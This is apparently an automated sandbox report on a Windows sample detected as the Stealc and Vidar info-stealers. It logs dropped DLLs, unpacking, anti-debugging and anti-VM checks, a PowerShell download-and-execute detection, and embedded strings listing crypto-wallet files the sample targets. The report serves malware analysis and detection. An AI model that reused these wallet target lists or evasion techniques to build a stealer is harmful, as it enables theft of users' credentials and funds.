Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: mozglue.pdbP source: T220UXIoKO.exe, 00000000.00000002.2955692333.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: T220UXIoKO.exe, 00000000.00000002.2955692333.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Unpacked PE file: 0.2.T220UXIoKO.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Unpacked PE file: 0.2.T220UXIoKO.exe.400000.1.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00419860
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .boot
PE file contains an invalid checksum
Source: JDAKJDAAFB.exe.0.dr Static PE information: real checksum: 0x83f826 should be: 0x6c18e0
PE file contains sections with non-standard names
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name: .imports
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name: .themida
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name: .boot
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0041B035 push ecx; ret 0_2_0041B048
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6FB536 push ecx; ret 0_2_6C6FB549
Source: T220UXIoKO.exe Static PE information: section name: .text entropy: 7.016268527861018
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name: entropy: 7.958585366480971
Drops PE files
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\JDAKJDAAFB.exe Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\JDAKJDAAFB.exe Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00419860
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\ProgramData\JDAKJDAAFB.exe Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T220UXIoKO.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\T220UXIoKO.exe API coverage: 8.5 %
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00414910
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040DA80
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E430
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BE70
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004016D0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_00413EA0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F6B0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004138B0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_00414570
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040ED20
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DE10
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: T220UXIoKO.exe, 00000000.00000002.2934433959.000000000090E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwaret$
Source: T220UXIoKO.exe, 00000000.00000002.2934433959.000000000090E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: T220UXIoKO.exe, 00000000.00000002.2934433959.000000000090E000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2934433959.0000000000971000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\T220UXIoKO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\T220UXIoKO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\T220UXIoKO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\T220UXIoKO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\T220UXIoKO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\T220UXIoKO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\T220UXIoKO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\T220UXIoKO.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041B33A
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 0_2_004045C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00419860
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00419750 mov eax, dword ptr fs:[00000030h] 0_2_00419750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_00417850
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041B33A
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041AD48
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0041CEEA SetUnhandledExceptionFilter, 0_2_0041CEEA
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C6FB66C
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C6FB1F7
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C8AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C8AAC62
Source: C:\Users\user\Desktop\T220UXIoKO.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: T220UXIoKO.exe PID: 6592, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00419600
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6FB341 cpuid 0_2_6C6FB341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\T220UXIoKO.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00416920
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_00417850
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_00417A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.T220UXIoKO.exe.830e67.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.T220UXIoKO.exe.880000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T220UXIoKO.exe.830e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.T220UXIoKO.exe.880000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T220UXIoKO.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T220UXIoKO.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2934433959.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2934347582.0000000000830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1682295630.0000000000880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2933833911.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T220UXIoKO.exe PID: 6592, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: T220UXIoKO.exe PID: 6592, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: T220UXIoKO.exe String found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
Source: T220UXIoKO.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: T220UXIoKO.exe String found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
Source: T220UXIoKO.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: T220UXIoKO.exe String found in binary or memory: \jaxx\Local Storage\
Source: T220UXIoKO.exe String found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
Source: T220UXIoKO.exe String found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
Source: T220UXIoKO.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: T220UXIoKO.exe String found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
Source: T220UXIoKO.exe String found in binary or memory: passphrase.json
